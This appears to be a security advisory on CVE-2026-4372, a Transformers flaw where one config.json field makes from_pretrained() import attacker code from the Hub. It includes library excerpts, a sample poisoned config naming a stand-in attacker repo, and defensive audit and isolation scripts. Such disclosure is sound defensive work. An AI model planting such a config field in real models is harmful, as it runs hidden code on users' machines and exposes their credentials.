
Transformers config injection: silent RCE that walks past trust_remote_code

CVE-2026-4372, disclosed June 4, 2026, lets a single config.json field run attacker code on a routine from_pretrained() call — bypassing trust_remote_code=False in Hugging Face Transformers.

2026-06-10 // 7 min affects: huggingface-transformers, kernels

What is this?

CVE-2026-4372 is a remote code execution vulnerability in Hugging Face’s transformers library, disclosed publicly on June 4, 2026 by Yotam Perkal of Pluto Security and reported the same day by CSO Online. It lets an attacker run arbitrary Python on the machine of anyone who loads a poisoned model with the standard from_pretrained() call, even if the victim never sets trust_remote_code=True.

The trigger is a single field in a model’s config.json. There are no warnings, no consent prompts, and no unusual log entries: the code executes inside the library before from_pretrained() even returns. NVD published the CVE on May 24, 2026 at a CVSS 3.0 base score of 7.8 (High), classified as CWE-1066. Pluto’s blog notes they originally submitted it as Critical; Hugging Face reduced the score to High because exploitation depends on an optional package being present.

How it works

The bug is the intersection of three independent design decisions, none dangerous alone. Pluto traced the full chain; CSO Online corroborated it with the maintainers’ fix.

First, when transformers parses a downloaded config.json, a generic loop in configuration_utils.py stamps every key-value pair onto the config object via setattr, with no allowlist and no distinction between public parameters and private, underscore-prefixed internal attributes:

# configuration_utils.py — untrusted JSON -> object attributes
for key, value in kwargs.items():
    setattr(self, key, value)   # no allowlist, no validation
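To make the effect of that loop concrete, here is a minimal sketch using a hypothetical ToyConfig class. It is a stand-in written for this article, not the real transformers config class; only the setattr pattern and the field name come from the write-up above.

```python
import json


class ToyConfig:
    """Hypothetical stand-in for a config class; not the real transformers code."""

    def __init__(self, **kwargs):
        # Internal state the library expects to set itself.
        self._attn_implementation_internal = None
        # Same pattern as the loop above: every JSON key becomes an attribute.
        for key, value in kwargs.items():
            setattr(self, key, value)


# Untrusted JSON, as it might arrive in a downloaded config.json.
untrusted = json.loads(
    '{"model_type": "llama",'
    ' "_attn_implementation_internal": "attacker-acct/optimized-attn-kernel"}'
)

config = ToyConfig(**untrusted)

# The "private" attribute now holds a value chosen by whoever wrote the JSON.
print(config._attn_implementation_internal)
```

The underscore prefix is only a naming convention in Python. Nothing in setattr treats it differently from a public field.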

Second, one of those internal attributes — _attn_implementation_internal — controls which attention kernel the model uses. Since transformers v4.50.0 (the “Hub Kernels” feature), a value shaped like owner/repo is treated as a reference to a downloadable kernel package on the Hub. The dispatch path in hub_kernels.py accepts any owner/repo string and imports it:

# hub_kernels.py (simplified): any owner/repo string is fetched and imported
import re

def is_kernel(attn_implementation):
    # the "..." marks a part of the pattern elided in this excerpt
    return re.search(r"^[^/:]+/[^/:]+...$", attn_implementation) is not None
# -> get_kernel() -> downloads the Hub package -> importlib import
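The check above tests only the shape of the string, not who owns the repository. The sketch below illustrates that with a deliberately simplified pattern covering only the owner/repo part. The pattern and the function name looks_like_kernel_ref are assumptions for illustration; the real pattern in hub_kernels.py is longer.

```python
import re

# Assumption: simplified pattern matching only "owner/repo".
# The real pattern in hub_kernels.py has more to it than this.
OWNER_REPO = re.compile(r"^[^/:]+/[^/:]+$")


def looks_like_kernel_ref(attn_implementation: str) -> bool:
    """Return True when the value has the owner/repo shape."""
    return OWNER_REPO.search(attn_implementation) is not None


candidates = [
    "sdpa",
    "eager",
    "flash_attention_2",
    "attacker-acct/optimized-attn-kernel",
]
for value in candidates:
    print(f"{value!r}: {looks_like_kernel_ref(value)}")
```

Built-in implementation names contain no slash and fail the check, while any account name followed by a slash and a repo name passes. A shape test like this cannot tell a trusted publisher from an attacker.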

Third, that import is unsandboxed: no code signing, no integrity check, no prompt. Importing a Python package runs its __init__.py. So an attacker publishes a normal-looking model whose config.json includes one extra line:

{
  "model_type": "llama",
  "architectures": ["LlamaForCausalLM"],
  "_attn_implementation_internal": "attacker-acct/optimized-attn-kernel"
}

When a victim runs AutoModelForCausalLM.from_pretrained("attacker-acct/finance-llama-7b"), the library downloads and imports the attacker’s package, executing whatever lives in its __init__.py at the user’s privilege level. Stub functions in that package let model loading finish normally, so nothing looks wrong.

Crucially, the trust_remote_code=False default never enters the picture — the library’s own sanitizers covered the public attn_implementation field and stripped _attn_implementation_internal on the write path, but never gated it on the read path from untrusted JSON. The front door was locked; the back door was open.

Why it matters

transformers is one of the most-installed Python packages in existence: per Pluto, 2.2B+ total PyPI installs and ~146M downloads per month. The vulnerable code path was introduced in v4.56.0 (August 29, 2025) and removed in v5.3.0 (March 4, 2026) — a roughly 187-day exposure window during which Pluto measured ~232 million downloads of vulnerable versions (4.56.0–5.2.x).
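The exposure window can be checked directly from the two release dates quoted above. The per-day figure is only a rough average derived from Pluto's ~232 million estimate, not a number Pluto reported.

```python
from datetime import date

introduced = date(2025, 8, 29)  # v4.56.0 release date, per the article
fixed = date(2026, 3, 4)        # v5.3.0 release date, per the article

exposure_days = (fixed - introduced).days
print(exposure_days)  # 187

# Rough average only: the ~232M figure is Pluto's estimate for the whole window.
vulnerable_downloads = 232_000_000
avg_per_day = vulnerable_downloads / exposure_days
print(f"about {avg_per_day / 1e6:.1f} million downloads per day")
```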

Exploitation requires the optional kernels package to be installed — a real limiting factor, but a deceptive one. kernels ships with transformers[all], with Hugging Face’s reference Dockerfiles, and with most GPU-accelerated inference setups. As Pluto put it, the people most likely to have it are exactly the high-value targets: enterprise ML platforms, CI/CD pipelines that call from_pretrained() automatically, and GPU clusters holding cloud credentials, training data, and model artifacts. A single compromised model load can yield AWS keys, SSH keys, .env secrets and Kubernetes configs, then lateral movement.

This is not theoretical. CSO Online notes a malicious repo posing as an OpenAI “Privacy Filter” model reached the Hub’s #1 trending spot and 244,000 downloads within 18 hours before takedown — and that attack still required the victim to manually run a loader script. CVE-2026-4372 removes even that step. It also rhymes with CVE-2025-32434 (April 2025), the PyTorch torch.load flaw that achieved RCE despite weights_only=True — the same shape of bug: a documented “safe” mode leaking a code-execution primitive through an adjacent path the flag never covered.

A second lesson is about visibility, not patch speed. Hugging Face fixed the bug fast (10 days from report to v5.3.0), but the fix shipped as a one-line “security vulnerability” bullet in routine release notes; the CVE landed on NVD 81 days later. Per Pluto’s telemetry, vulnerable versions were still being downloaded 7–8 million times per week — about a quarter of weekly installs — months after the patch. A patch without a loud advisory does not protect defenders who never learned they needed it.

Defenses

If you use transformers, upgrade to v5.3.0 or later now, and check whether any pinned environment is still on 4.56.0–5.2.x. Both Pluto and CSO confirm vulnerable versions remain heavily downloaded.

Audit your configs. Search any cached or downloaded config.json for _attn_implementation_internal (and, post-fix, _experts_implementation_internal). Their presence in a Hub-sourced config is a red flag. More broadly, reject configs carrying unexpected underscore-prefixed fields before loading.
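A minimal sketch of such an audit follows. The function names and the default cache location (~/.cache/huggingface/hub) are assumptions; point it at wherever your environment stores downloaded models. It only inspects top-level keys and loads nothing.

```python
import json
from pathlib import Path

# Fields named in the advisory as red flags in Hub-sourced configs.
FLAGGED = {"_attn_implementation_internal", "_experts_implementation_internal"}


def audit_config(path):
    """Return (flagged, other_private) top-level keys found in one config.json."""
    try:
        data = json.loads(Path(path).read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return set(), set()  # unreadable or not valid JSON: nothing to report
    if not isinstance(data, dict):
        return set(), set()
    private = {key for key in data if key.startswith("_")}
    return private & FLAGGED, private - FLAGGED


def audit_tree(root):
    """Scan every config.json under root and collect underscore-prefixed keys."""
    root = Path(root).expanduser()
    findings = {}
    if not root.is_dir():
        return findings
    for cfg in root.rglob("config.json"):
        flagged, other = audit_config(cfg)
        if flagged or other:
            findings[str(cfg)] = {
                "flagged": sorted(flagged),
                "other_private": sorted(other),
            }
    return findings


if __name__ == "__main__":
    # Assumption: default Hugging Face cache location; adjust for your setup.
    for path, result in audit_tree("~/.cache/huggingface/hub").items():
        print(path, result)
```

Anything under "flagged" deserves immediate attention. Entries under "other_private" are a review list rather than proof of compromise, since saved configs can legitimately carry fields such as _name_or_path.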

Treat model loading as a code-execution surface, regardless of “safe” flags. This is the durable takeaway. Run from_pretrained() (and torch.load()) inside isolated, monitored containers with no host credentials, no outbound network egress, and minimal filesystem access. Don’t let a process that loads untrusted models also hold production secrets.
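One small piece of that separation can be sketched in plain Python: running the load in a child process that inherits none of the parent's environment variables. The helper name run_loader_isolated is hypothetical, and the sketch assumes a POSIX system. It is not a sandbox, because the child can still read files such as SSH keys and open network connections, so it complements container isolation rather than replacing it.

```python
import subprocess
import sys


def run_loader_isolated(code, allowed_env=None, timeout=600):
    """Run `code` in a child Python process with an explicit, minimal environment.

    Only the variables in `allowed_env` are passed on; anything else in the
    parent's environment (cloud keys, tokens) is not inherited.
    """
    env = dict(allowed_env or {})
    return subprocess.run(
        [sys.executable, "-c", code],
        env=env,
        capture_output=True,
        text=True,
        timeout=timeout,
    )


if __name__ == "__main__":
    # Demonstration: the child lists the environment variables it can see.
    result = run_loader_isolated("import os; print(sorted(os.environ))")
    print(result.stdout)
```

In practice the code string would be the script that calls from_pretrained(), with allowed_env limited to what that script needs, for example HOME so the cache can be located.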

Verify provenance. Prefer models from known publishers; for unknown ones, tools like Cisco’s open-source Model Provenance Kit can fingerprint weights, tokenizers and architecture metadata against known base-model families.

The v5.3.0 fix itself is defense-in-depth: it denylists _attn_implementation_internal and _experts_implementation_internal in the setattr loop (PR #44395), and now requires trust_remote_code=True for any kernel repo outside the official kernels-community org. As Pluto notes, a denylist is only as good as the developer’s foresight — an allowlist of permitted config fields would be the more robust long-term design.
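The difference between the two designs shows up as soon as a new internal field appears. The sketch below is illustrative only: the allowlist contents and the field _some_future_internal are hypothetical, and neither function is the code from PR #44395.

```python
# The two fields the v5.3.0 fix denylists, per the article.
DENYLIST = {"_attn_implementation_internal", "_experts_implementation_internal"}

# Hypothetical allowlist, for illustration only; a real one would be much longer.
ALLOWLIST = {"model_type", "architectures", "hidden_size"}


def filter_denylist(raw):
    """Drop known-bad keys; everything else passes through."""
    return {k: v for k, v in raw.items() if k not in DENYLIST}


def filter_allowlist(raw):
    """Keep only keys that are explicitly expected."""
    return {k: v for k, v in raw.items() if k in ALLOWLIST}


raw = {
    "model_type": "llama",
    "_attn_implementation_internal": "attacker-acct/optimized-attn-kernel",
    "_some_future_internal": "attacker-acct/other-package",  # hypothetical field
}

print(sorted(filter_denylist(raw)))   # the hypothetical future field survives
print(sorted(filter_allowlist(raw)))  # only expected public fields survive
```

The denylist blocks exactly the fields someone thought to list, while the allowlist fails closed on anything new, at the cost of having to maintain the list of permitted fields.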

Status

Item | Detail
--- | ---
CVE | CVE-2026-4372 (CWE-1066), CVSS 3.0 base 7.8 High (NVD)
Affected | transformers 4.56.0 – 5.2.x with the optional kernels package
Introduced | v4.56.0, 2025-08-29 (Hub Kernels dispatch refactor)
Fixed | v5.3.0, 2026-03-04 (PR #44395)
Reported / Disclosed | huntr report 2026-02-23; NVD publication 2026-05-24; public write-up 2026-06-04
Discoverer | Yotam Perkal, Pluto Security
Action | Upgrade to ≥ 5.3.0; audit configs; sandbox model loading

Sources